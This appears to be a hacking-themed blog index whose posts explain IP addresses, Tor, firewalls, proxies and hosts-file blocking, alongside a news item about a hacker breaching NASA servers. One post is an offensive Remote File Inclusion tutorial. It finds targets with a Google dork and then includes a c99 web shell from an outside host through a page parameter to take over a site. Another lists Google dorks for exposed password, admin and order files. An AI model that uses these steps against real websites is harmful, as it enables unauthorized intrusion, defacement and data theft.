Pages

Banner 468 x 60px

 

Friday, May 20

White hat hacker exposes NASA servers' vulnerabilities

0 comments
White hat hacker exposes NASA servers' vulnerabilities

A Romanian "white hat" hacker has claimed to have broken into a site of the National Aeronautics and Space Administration (NASA), and published a screenshot of the compromised server on his site.

White hat hackers are programmers who break into computer systems for the sake of exposing security flaws, instead of exploiting them for malevolent purposes.

In this case, "TinKode" hacked a file transfer protocol (FTP) server related to NASA's Earth Observation System at Goddard Space Flight Center.

"I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like an security audit, but for free," TinKode said in an interview posted on NetworkWorld.

The NetworkWorld story said that, after hacking into servir.gsfc.nasa.gov, TinKode sent an email alert of the hack to NASA's webmaster.

His screenshot shows folders like RADARSAT, ASAR, ASAR_Aus, ASAR_Africa, and ASAR_Haiti.

ASAR is short for Advanced Synthetic Aperture Radar, a technology used by NASA.

One month ago, TinKode exposed a similar security hole at another space agency by hacking into a server operated by the European Space Agency at www.esa.int.

He then leaked a list of FTP accounts, email addresses and passwords for administrators and editors.

Early this year, TinKode and hackers Ne0h and Jackh4x0r hacked into the Web servers hosting MySQL.com, proving it was vulnerable to SQL injection as well as XSS.

In the NetworkWorld interview, TinKode said making the breaches public makes the companies fix the vulnerability faster.

He also said finding security holes is a "hobby" for him.

"I am doing this because finding security holes represents a hobby for me. If someone wants to hire me, we can discuss, isn't a problem," he said.
Read more...

Thursday, May 19

Private and Public IP Addresses

2 comments
What are Private and Public IP Addresses


Internet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.



What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.

A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.

You can check your public IP address by visiting www.whatismyip.com

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):

10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from 192.168.1.1 to 192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).

Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.

If the private network is connected to the Internet (through an Internet connection via ISP) then each computer will have a private IP as well as a public IP. Private IP is used for communication within the network where as the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private as well as a public IP.

You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.

Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transparency.
Read more...

Tuesday, May 10

Surf Web Anonymously with TOR

1 comments

What is TOR ?

Tor-proxy is a free proxy-server service that Internet users can use to hide their IP address while surfing the Web. An IP address is a number used to identify computers on the Internet, and for reasons of safety and security, it may sometimes be desirable to hide the address.

What is Vidalia ?
Vidalia is a GUI (graphical user interface) implementation for Tor, It allows the user to start, stop, and view the status of Tor; monitor bandwidth usage; view, filter, and search log messages; and configure some aspects of Tor.

Difference between an Anonymous Proxy and Tor-proxy

Well you will be wondering and saying what is the need of Tor-proxy when we are able to do the same thing using an Anonymous proxy ?. To clear your doubts lets see how an Anonymous proxy and Tor works

Working of an anonymous proxy

In the above example we are connecting to the web server through a proxy server .So a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing . But what if owner of proxy server starts reviling our identity.So we are not sure on what proxy-server to relay on to stay anonymous


Working of Tor-proxy


Tor actually works on a deeper level dealing with a computer’s SOCKETS directly.I will
not be going to deep into it as most readers will find it very difficult to understand the
explanation .In simple words Tor network uses a distributed network of nodes – of other
Tor users – to re-route all the packets from your network.What this means is – no single link can identify the source and the destination

In the above example the client passes through three different servers or nodes before reaching the actual web server. The path taken by the client is denoted by green arrows

Node 1 Knows the actual origin(client) but not the actual destination (web server)
Node 5 Neither knows the actual origin nor the actual destination.
Node 9 Knows the actual destination but not the actual origin.

Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.

Using Tor and vidalia to surf the web Anonymously :-

1. First download and Install Tor-bundle which includes Tor and vidalia from Here ,to get the password click Here

2. Open Tor-bundle and check all components as shown , follow the on screen instructions to finish instillation process



3. Now Open Vidalia Control Panel from task bar and Click on Start Tor

4. Now open Mozilla Firefox browser,and click on red highlighted Tor Disabled ON which is at the right hand corner of the browser , now it will turn green and say Tor Enabled.

To check weather your behind a proxy go to www.whatismyip.com you can see a different ip address after setting up Tor

Disadvantages of Tor :-

Since it passes through multiple Tor nodes, the Internet connection can be slow. Even with all this, Tor is not very safe. There are potential pitfalls and security threats. Tor by itself does not encrypt the payload , at the exit node .So a sniffer at the exit node can gather all the information. as show

So Unless the application encrypts data using (SSL), we can gather all the information form the exit node using a sniffer

**This post is taken from hackhaholic
Read more...

Wednesday, May 4

How Firewall Works

0 comments





If you have been using the Internet for any length of time, and especially if you work at a larger company and browse the Web while you are at work, you have probably heard the term firewall used. For example, you often hear people in companies say things like, "I can't use that site because they won't let it through the firewall."

How Firewall Works ?
Firewalls are basically a barrier between your computer and the internet. A firewall can be simply compared to security guard who stands at the entrance of your house and filters the
visitors coming to your place. He may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly firewall is a software program or a hardware device that filters the information coming through the internet in form of packets to your personal computer or a computer network.

Firewalls may decide to allow or block network traffic between devices based on the rules that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules that are most suitable under normal circumstances so that the user need not worry much about configuring the firewall.
Personal firewalls are easy to install and use and hence preferred by end-users for use on their personal computers. However large networks and companies prefer those firewalls that have plenty of options to configure so as to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and Web servers. In addition the company can even control how the employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus in addition to security, a firewall can give the company a tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:
1. Packet Filtering: In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded.
2. Stateful Inspection: This is a newer method that doesn’t analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are allowed to travel further. Otherwise they are discarded.

Firewall Configuration

Firewalls can be configured by adding one or more filters based on several conditions as mentioned below:
1. IP addresses
 In any case if an IP address outside the network is said to be unfavorable, then it is possible to set filter to block all the traffic to and from that IP address. For example, if a certain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.
2.Domain names
Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names.
3. Ports/Protocols
Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a Web (HTTP) service then it will be typically available on port 80. In order to avail this service, the client needs to connect to the server via port 80. Similarly different services such as Telnet (Port 23), FTP (port 21) and SMTP (port 25) services may be running on the server. If the services are intended for the public, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections.
4. Specific words/Phrases
 A firewall can be configured to filter one or more specific words or phrases so that, both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network.
Hardware vs Software Firewalls
Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority whereas, the software firewalls are less expensive and are most preferred in home computers and laptops. Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet in the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router.
Why Firewall ?
Firewalls provide security over a number of online threats such as Remote login, Trojan backdoors, Session hijacking, DOS & DDOS attacks, viruses, cookie stealing and many more. The effectiveness of the security depends on the way you configure the firewall and how you set up the filter rules. However major threats such as DOS and DDOS attacks may sometimes manage to bypass the firewalls and do the damage to the server. Even though firewall is not a complete answer to online threats, it can most effectively handle the attacks and provide security to the computer up to the maximum possible extent.


Read more...

How to Surf web Anonymously with Proxies

1 comments


Are you looking to surf the Internet without anyone knowing your location or details? Do you want to regain access to a banned website or forum? Well you’ve come to the right place as in this article I will answer the frequently asked question, How to Surf the Web Anonymously? , How to access restricted websites?

There are many ways to surf the web anonymously. But the best way to surf the web Anonymously without spending a single penny is by using Proxies.

What is a Proxy?

A Proxy is an ipaddress of a Server(Proxy Server) that is placed in between your computer and the internet.

The advantage of a proxy is that your real IP address is Hidden so when you hack your giving the IP address of the proxy sever and not your real IP address Same way if your a normal Internet user the hacker won't get your real IP but the IP of the proxy server.You can use it to enter site or forum that you are IP is banned
Follow the steps given below to Surf the web Anonymously

How to surf web anonymously with proxies

First we need a proxy server. There are thousands of proxy servers on the net. You can find then in google. I use the www.hidemyass.com

Select require proxy ipaddress and port from the hidemyass.com

Using Proxy In the Mozilla Firefox

1. Open Mozilla Firefox, Go to Tools menu -> Options

2. Select Advanced tab -> Network Tab -> In the connection select Settings

3. Connection Settings -> Select Manual Proxy Configuration (Radio Button)

4. Enter proxy ipadress and port and click ok.

5. Refresh the google.com page .

To check weather your proxy changed or not go to www.whatismyip.com. you can see a different ipaddress after setting up your proxy

Please comment this tutorial if you find useful


Read more...

Monday, May 2

RFI(Remote File Inclusion)

0 comments

Remote File Inclusion

Remote File Inclusion ( RFI ) allows the attacker to upload his file on a website server using a script. Remote File Inclusion is a common vulnerability found in many websites. Using RFI you can literally deface the websites, get access to the server. Here i am going to describe this.

Searching the Vulnerability:

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to this:

www.anywebsite.com/index.php?page=something


If you want to find more website like this try is with google dork.

inurl:index.php?page=

After going to the target website test it for RFI vulnerability. Use this:

www.anywebsite.com/index.php?page=http://www.google.com


after pressing enter if the google's homepage is there on the website, then this website is vulnerable to RFI attack.

Now you can execute your own scripts on the webserver of this website.


www.anywebsite.com/index.php?page=http://www.freehackersite.com/script.php


look at the original URL there is no extension. It means it is adding extension mnually so use "" after your url.

Now to gain access you should use c99 shell. you can download c99 shell from the link below:



now upload this script to any webhost and get a url of that. Let's say your url is like this:

www.mywebsite.com/c99.txt?

**Question Mark is must

now use your url in place of google url.

www.anywebsite.com/index.php?page=http://www.mywebsite.com/c99.txt?


Now the you are inside the website and you can do anything with it

Read more...

Google Hacking

2 comments
Google hacking doesn't mean to hack Google. Google hacking term used when a hacker tries to find vulnerable targets or sensitive data by using the Google search engine.In Google hacking hackers use search engine commands to locate sensitive data and vulnerable devices on the Internet. Google supports a multitude of operators and modifiers that add a ton of power to google searching

I am going to explain some operators used in Google hacking


intitle:

Syntax: intitle:operator
This will return all the pages that have word entered after the intitle (as we used operator here) in the title of the page. If you want to check for multiple keywords in title use allintitle in place of intitle.
allintitle:operator1 operator2....

inurl:

Syntax: inurl:operator
This will return all the pages that have word entered after the inurl in the url of a page. If you want to check for multiple keywords in url use allinurl in place of inurl.
allinurl:operator1 operator2....

site:
Syntax: site:Domain
This will return all the pages that have certain keywords in that particular site or domain.


link:
Syntax: link:URL
This will list down webpages that have links to the specified webpage.

intext:

Syntax: intext:operator
This will return all the pages that have word entered after the intext in the particular website. If you want to check for multiple keywords in website use allintext in place of intext.
allintext:operator1 operator2....

related:
Syntax: related:URL
The “related:” will list web pages that are "similar" to a specified web page. For Example:
“related:www.hyderabadhack.blogspot.com” will list web pages that are similar to the hyderabadhack homepage

cache:
Syntax: cache:URL
The cache operator will search through google’s cache and return the results based on those documents. You can alternatively tell cache to
highlight a word or phrase by adding it after the operator and URL.

info:
Syntax: info:URL
This tag will give you the information that Google has on the given URL.

filetype:
Syntax: filetype:keyword
This will restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).
Well, the Google’s query syntaxes discussed above can really
help people to precise their search and get what they are
exactly looking for.

Other Queries
inurl:admin filetype:txt

inurl:admin filetype:db

inurl:admin filetype:cfg

inurl:mysql filetype:txt

inurl:passwd filetype:txt

inurl:iisadmin

inurl:auth_user_file.txt

inurl:orders.txt

inurl:"wwwroot/*."

inurl:adpassword.txt

inurl:webeditor.php

inurl:file_upload.php

Looking for vulnerable sites using Google Hacks
allintitle: "index of /root”

allintitle: "index of /admin”


Read more...

Block any Website on your computer without any software

0 comments

There are many people who want some website inaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.

Steps:

1. go to C:\WINDOWS\system32\drivers\etc
2. Find a file named "HOSTS"
3. Open this file in notepad
4. Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessible.

You can add as many url of websites under this by increasing last no. of ip as

127.0.0.3 www.abcxyz.com
127.0.0.4 www.xyzas.com

an so on.

To unblock these website only erase the line corresponding to that website.

Read more...